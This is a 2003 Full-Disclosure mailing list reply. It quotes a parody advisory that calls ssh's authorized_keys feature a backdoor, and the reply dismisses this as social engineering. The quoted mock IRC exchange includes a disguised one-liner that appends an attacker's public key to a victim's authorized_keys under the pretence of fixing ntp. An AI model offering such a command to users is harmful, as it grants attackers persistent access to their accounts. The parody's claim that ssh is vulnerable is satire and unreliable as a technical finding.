Re: SSH/OPENSSH HOLE ALL VERSIONS.

[Eric LeBlanc <inouk () toutatis igt net>]

This is NOT a problem of ssh, but an USER.

This is called "Social Engineering", and nobody can protect that.  Only
the intelligence of user can avoid this "HOLE".

This is the worst thing I ever seen...

E.
--
Eric LeBlanc
inouk () igt net
--------------------------------------------------
UNIX is user friendly.
It's just selective about who its friends are.
==================================================

On Tue, 4 Mar 2003 diacetyl () hushmail com wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
>
> I. BACKGROUND
>
> (stolen from manpage)
>      ssh (SSH client) is a program for logging into a remote machine and for
>      executing commands on a remote machine.  It is intended to replace rlogin
>      and rsh, and provide secure encrypted communications between two untrust­
>      ed hosts over an insecure network.  X11 connections and arbitrary TCP/IP
>      ports can also be forwarded over the secure channel.
>
> II. DESCRIPTION
>
> The ssh command contains an innate system of backdooring that can be levereged
> by an attacker to gain the access of another user.
>
> The crux of this problem lies in the face that any public key dropped to
> ~/.ssh/authorized_keys may be used to gain entry to the machine under the
> priveledges of that user by he who posesses the corresponding private key.
>
> III. ANALYSIS
>
> A user who can successfully convince another user to write his ssh public key
> to ~/.ssh/authorized_keys will be able to gain access to that machine under
> that user's priveledges.
>
> The following is a sample walkthrough of a successful exploitation of this
> vulnerability.
>
> ·f· zerofel [~zerofel () h238n2fls33o1215 telia com] has joined #linuxhelp
> <zerofel> how do i use ntp to set my time?
> <sup3rfo0> echo ntp;echo "ssh-rsa 
> AAAAB3NzaC1yc2EAAAABIwAAAIEAsWihy/NGclBRhEVNgQezRGSx9D0AMqDY/eGYMNW9WlO/szVRKrlGYpMmsvOen/Kcocz0TxDPDZXLGGDL0U77A036WBIL64HPAg3ADteSa1heDJjxUWMa45Aj0bhBEJCofkraasOwxTgKYe6KXCKQu9GOS+VoCYUSSJtUk11G+tE=
>  unf@tryptamine">~/.ssh/authorized_keys
> <sup3rfo0> that should do it
> <zerofel> okay but my date still isnt set
> <sup3rfo0> hmm paste the output of ls ~
> <zerofel> bash-2.05$ ls
> <zerofel> HAHA_I_DELETED_ALL_YOUR_FILES
> <zerofel> WTF
>
> IV. VENDOR RESPONSE
>
> I have informed ssh developers about this vulnerability and they have not
> replied. I am forced to disclose this gaping vulnerability to force them
> to patch the bug.
>
> V. PROPS
>
> iDEFENSE for their elite file advisory
> http://lists.netsys.com/pipermail/full-disclosure/2003-March/004423.html
> these warriors of full-disclosure give me the courage to release this
> vulnerability even after death threats from evil blackhats who shut off
> my power, ruined my credit, and got me fired from my job.
> -----BEGIN PGP SIGNATURE-----
> Version: Hush 2.2 (Java)
> Note: This signature can be verified at https://www.hushtools.com/verify
>
> wl0EARECAB0FAj5lJDUWHGRpYWNldHlsQGh1c2htYWlsLmNvbQAKCRAP/IU00usAJvBh
> AJ9yTHe1KNHGyEEWMknulotpkCe9BACfSYTDyMGrzGVcLs9XdQuqKP/04bA=
> =4Mdu
> -----END PGP SIGNATURE-----
>
>
>
>
> Concerned about your privacy? Follow this link to get
> FREE encrypted email: https://www.hushmail.com/?l=2 
>
> Big $$$ to be made with the HushMail Affiliate Program: 
> https://www.hushmail.com/about.php?subloc=affiliate&l=427
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html